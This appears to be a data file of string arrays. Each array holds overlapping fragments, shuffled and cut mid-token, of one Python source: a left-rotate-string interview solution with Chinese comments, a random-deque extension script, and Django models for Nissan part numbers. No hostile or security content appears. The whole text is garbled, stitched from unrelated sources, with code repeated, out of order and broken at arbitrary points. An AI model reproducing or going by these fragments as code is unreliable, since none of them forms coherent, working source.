"''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end],",
"+= 1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate",
"'''面试题58-2:左旋转字符串 字符串的左旋转操作是把字符串前面的若干个字符转移到字符串的尾部。 请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n):",
"[x for x in string] begin = 0 div = n - 1",
"input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is None",
"- 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end)",
">len(string): return None str_arr = [x for x in string] begin = 0"
] |
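For reference, the same rotation can be cross-checked with Python slicing; left_rotate_slice below is an illustrative name, not part of the original solution.

def left_rotate_slice(s, n):
    # Slicing gives the identical result to the three-reversal trick.
    return s[n:] + s[:n] if s else None


assert left_rotate_slice('abcdefg', 2) == 'cdefgab'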
[
"max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext)",
"# object. # # Program Author : <NAME> <<EMAIL>> # # Creation Date",
"randint from collections import deque def create_random_deque(low: int, high: int, size: int) ->",
"Program purpose: Adds more number of elements to a deque object from an",
"ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _ in range(size)])",
"python3 ############################################################################################ # # # Program purpose: Adds more number of elements to",
"= create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random",
"== \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque",
"# # Program purpose: Adds more number of elements to a deque object",
"Author : <NAME> <<EMAIL>> # # Creation Date : December 27, 2019 #",
"int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new",
"({size}) for new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque:",
"deque object from an iterable # # object. # # Program Author :",
"a deque object from an iterable # # object. # # Program Author",
"object. # # Program Author : <NAME> <<EMAIL>> # # Creation Date :",
"more number of elements to a deque object from an iterable # #",
"print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended",
"# # Creation Date : December 27, 2019 # # # ############################################################################################ from",
"{new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended deque: {new_deque}')",
"deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size",
"<<EMAIL>> # # Creation Date : December 27, 2019 # # # ############################################################################################",
"({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ ==",
"purpose: Adds more number of elements to a deque object from an iterable",
"for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5)",
"max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext})",
"############################################################################################ from random import randint from collections import deque def create_random_deque(low: int, high:",
"\"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with",
"new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5",
"iterable # # object. # # Program Author : <NAME> <<EMAIL>> # #",
"None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return",
"if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') #",
"# ############################################################################################ from random import randint from collections import deque def create_random_deque(low: int,",
"_ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New",
"Program Author : <NAME> <<EMAIL>> # # Creation Date : December 27, 2019",
"import randint from collections import deque def create_random_deque(low: int, high: int, size: int)",
"elements to a deque object from an iterable # # object. # #",
"max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if",
"size: int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for",
"December 27, 2019 # # # ############################################################################################ from random import randint from collections",
"deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return",
"create_random_deque(low: int, high: int, size: int) -> deque: if size < 0: raise",
"<NAME> <<EMAIL>> # # Creation Date : December 27, 2019 # # #",
"from random import randint from collections import deque def create_random_deque(low: int, high: int,",
"deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended deque:",
"for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext",
"from an iterable # # object. # # Program Author : <NAME> <<EMAIL>>",
"range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise",
"0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _",
"__name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend",
"raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _ in",
"# # ############################################################################################ from random import randint from collections import deque def create_random_deque(low:",
"high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque,",
"Creation Date : December 27, 2019 # # # ############################################################################################ from random import",
"in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0:",
"# Program Author : <NAME> <<EMAIL>> # # Creation Date : December 27,",
"int, high: int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid",
"return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque =",
"import deque def create_random_deque(low: int, high: int, size: int) -> deque: if size",
"add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max",
"deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque",
"def create_random_deque(low: int, high: int, size: int) -> deque: if size < 0:",
"size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5)",
"max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20,",
"deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None:",
"high: int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid size",
"object from an iterable # # object. # # Program Author : <NAME>",
"source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0,",
"# # # Program purpose: Adds more number of elements to a deque",
"# # object. # # Program Author : <NAME> <<EMAIL>> # # Creation",
"27, 2019 # # # ############################################################################################ from random import randint from collections import",
"of elements to a deque object from an iterable # # object. #",
"size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high)",
"an iterable # # object. # # Program Author : <NAME> <<EMAIL>> #",
"# Program purpose: Adds more number of elements to a deque object from",
"new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext:",
"# Creation Date : December 27, 2019 # # # ############################################################################################ from random",
"0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _",
"-> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new deque')",
"collections import deque def create_random_deque(low: int, high: int, size: int) -> deque: if",
"to a deque object from an iterable # # object. # # Program",
": <NAME> <<EMAIL>> # # Creation Date : December 27, 2019 # #",
"2019 # # # ############################################################################################ from random import randint from collections import deque",
"size ({size}) for new deque') return deque([randint(low, high) for _ in range(size)]) def",
"deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int)",
"if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0,",
"high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if",
"int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for",
"number of elements to a deque object from an iterable # # object.",
"if size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low,",
"#!/usr/bin/env python3 ############################################################################################ # # # Program purpose: Adds more number of elements",
"Date : December 27, 2019 # # # ############################################################################################ from random import randint",
"create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data.",
"< 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for",
"size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__",
"deque def create_random_deque(low: int, high: int, size: int) -> deque: if size <",
"return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) ->",
"raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in",
"def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid",
"int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size})",
": December 27, 2019 # # # ############################################################################################ from random import randint from",
"in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque:",
"_ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext <",
"< 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for",
"random import randint from collections import deque def create_random_deque(low: int, high: int, size:",
"from collections import deque def create_random_deque(low: int, high: int, size: int) -> deque:",
"# # Program Author : <NAME> <<EMAIL>> # # Creation Date : December",
"range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}')",
"Adds more number of elements to a deque object from an iterable #",
"for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\":",
"ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)])",
"for new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque,",
"# # # ############################################################################################ from random import randint from collections import deque def",
"############################################################################################ # # # Program purpose: Adds more number of elements to a",
"-> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque')"
] |
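A short sketch of the deque operations the program relies on; the values are arbitrary. Note that extend() appends on the right while extendleft() consumes its iterable in reverse.

from collections import deque

d = deque([1, 2, 3])
d.extend([4, 5])         # right-side append, as in add_nums_to_deque
d.extendleft([0, -1])    # left-side append; note the reversal
d.rotate(1)              # rotate one step to the right
print(d)                 # deque([5, -1, 0, 1, 2, 3, 4])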
[
"(\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\")",
"__str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle",
"to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\"",
"feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel):",
"PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan",
"= models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure",
"= _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"]",
"def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20,",
"of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name",
"[\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class",
") selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS",
"Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField(",
"[\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way",
"_(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber",
"SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\",",
"bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") )",
"_(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view',",
"str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\")",
"Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return reverse('item_class_read',",
"= _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return",
"Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"),",
"Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return",
"_ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel",
"= ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber =",
"= _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering",
"class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\",",
"= _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return",
"TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table =",
"(\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField(",
"django.db import models from django.utils.translation import gettext_lazy as _ from django.urls import reverse",
"django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager",
"AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan",
"(\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\",",
"= _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def",
"on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural =",
"parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\",",
"models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status =",
"_(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering =",
"(\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code",
"\"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS",
"max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit",
"!Find way to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price)",
"name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table =",
"PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20,",
"add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit",
"db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\")",
"(\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"),",
"= _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager,",
"verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table",
"\"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code =",
"max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField(",
"verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\")",
"import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan",
"= models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") )",
"Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of",
"partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"),",
"\"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") )",
"max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number",
"parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = (",
"self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type =",
"from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"),",
"max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta:",
"Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\",",
"class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit",
"from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class",
"from django.db import models from django.utils.translation import gettext_lazy as _ from django.urls import",
"choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table =",
"reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template @property def",
"ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) #",
"(\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), )",
") unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\")",
"models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure =",
"django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager,",
"class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part",
"verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self):",
"def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in",
"(\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = (",
"def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\")",
"class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField(",
"import gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from",
"\"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts",
"Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper()",
") status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"),",
"ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField(",
"verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price =",
"class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta:",
"as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import",
"TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"),",
"models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE )",
"max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price",
") bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\")",
"_(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def",
"__str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") )",
"= models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE",
"db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering =",
"verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def",
"(\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField( max_length=200,",
"return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type",
") class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural =",
"models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part",
"= _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self):",
"get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template",
"Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um",
"\"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\")",
"from django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers import",
"+ \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") )",
"def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to",
"return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this",
"template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um =",
"# !Find way to handle this feat in template @property def add_leading_zero(self): return",
"\"Deactivated\"), ) partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200,",
"\"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"),",
"return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of",
"verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table",
"max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code",
"TimeStampModel): class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge",
"class_name = models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\")",
"verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey(",
") class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts",
"= [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find",
"\"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\",",
") PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), )",
"um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\")",
"max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta:",
"source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode",
"verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200,",
"import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel):",
"of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return",
"TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"),",
"import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE = ( (\"01\",",
"Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name =",
"= models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE )",
"verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural",
"handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class",
"\"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\",",
"choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling",
") class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural =",
